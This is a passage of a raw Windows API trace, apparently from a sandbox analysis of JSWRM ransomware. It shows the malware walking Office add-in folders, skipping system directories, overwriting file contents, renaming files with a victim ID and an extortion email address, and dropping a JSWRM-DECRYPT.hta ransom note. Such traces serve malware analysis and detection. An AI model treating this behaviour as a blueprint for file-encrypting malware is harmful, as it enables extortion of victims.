returned 5 [0124.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0124.453] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\lt\\PowerViewRes.lt.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\lt\\powerviewres.lt.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0124.454] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=326027) returned 1 [0124.455] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0124.455] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0124.469] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.469] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0124.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0124.470] CloseHandle (hObject=0x338) returned 1 [0124.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0124.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0124.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0124.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0124.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0124.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0124.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0124.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0124.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0124.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0124.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0124.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0124.471] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\lt\\PowerViewRes.lt.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\lt\\powerviewres.lt.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\lt\\PowerViewRes.lt.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\lt\\powerviewres.lt.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0124.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0124.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0124.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0124.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0124.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0124.472] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x152a6704, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x152a6704, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15bbd5ad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f98b, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.lt.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0124.472] FindClose (in: hFindFile=0x231ec0 | out: hFindFile=0x231ec0) returned 1 [0124.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0124.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0124.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0124.473] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf035e09d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1525a179, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1525a179, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="lv", cAlternateFileName="")) returned 1 [0124.473] lstrcmpiW (lpString1="lv", lpString2=".") returned 1 [0124.473] lstrcmpiW (lpString1="lv", lpString2="..") returned 1 [0124.473] lstrcmpiW (lpString1="lv", lpString2="...") returned 1 [0124.473] lstrcmpiW (lpString1="lv", lpString2="windows") returned -1 [0124.473] lstrcmpiW (lpString1="lv", lpString2="recovery") returned -1 [0124.473] lstrcmpiW (lpString1="lv", lpString2="perflogs") returned -1 [0124.473] lstrcmpiW (lpString1="lv", lpString2="documents and settings") returned 1 [0124.473] lstrcmpiW (lpString1="lv", lpString2="$RECYCLE.BIN") returned 1 [0124.473] lstrcmpiW (lpString1="lv", lpString2="system volume information") returned -1 [0124.473] lstrcmpiW (lpString1="lv", lpString2="msocache") returned -1 [0124.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0124.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0124.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0124.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0124.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e340 [0124.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0124.473] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\lv\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\lv\\jswrm-decrypt.hta")) returned 0xffffffff [0124.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0124.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0124.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0124.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0124.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0124.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0124.475] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\lv\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\lv\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0124.533] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.533] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0124.534] CloseHandle (hObject=0x314) returned 1 [0124.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0124.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0124.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0124.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0124.534] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\lv\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\lv\\jswrm-decrypt.hta")) returned 0x20 [0124.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0124.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0124.534] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\lv\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf035e09d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1525a179, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40e4244c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231c00 [0124.535] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0124.535] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf035e09d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1525a179, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40e4244c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0124.535] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0124.535] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0124.535] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf035e09d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf035e09d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1662bb01, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc3ec0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0124.535] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0124.535] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0124.535] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0124.535] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0124.535] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0124.535] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0124.535] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0124.535] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.535] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0124.535] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0124.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2411c8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2411f0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0124.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0124.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0124.535] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40e4244c, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x40e4244c, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x40e4244c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0124.535] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0124.535] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0124.535] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0124.535] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0124.536] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0124.536] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0124.536] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0124.536] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0124.536] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0124.536] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0124.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.536] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0dcc568, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0dcc568, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0dcc568, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x11ac0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0124.536] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0124.536] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0124.536] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0124.536] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0124.536] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0124.536] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0124.536] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0124.536] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.536] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0124.536] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0124.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.536] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc62081b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc62081b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc646a83, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x12ad8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0124.536] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0124.537] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0124.537] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0124.537] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0124.537] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0124.537] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0124.537] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0124.537] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.537] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0124.537] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0124.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d578, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.537] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf475131d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf475131d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf475131d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4928, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0124.537] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0124.537] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0124.537] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0124.537] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0124.537] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0124.537] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 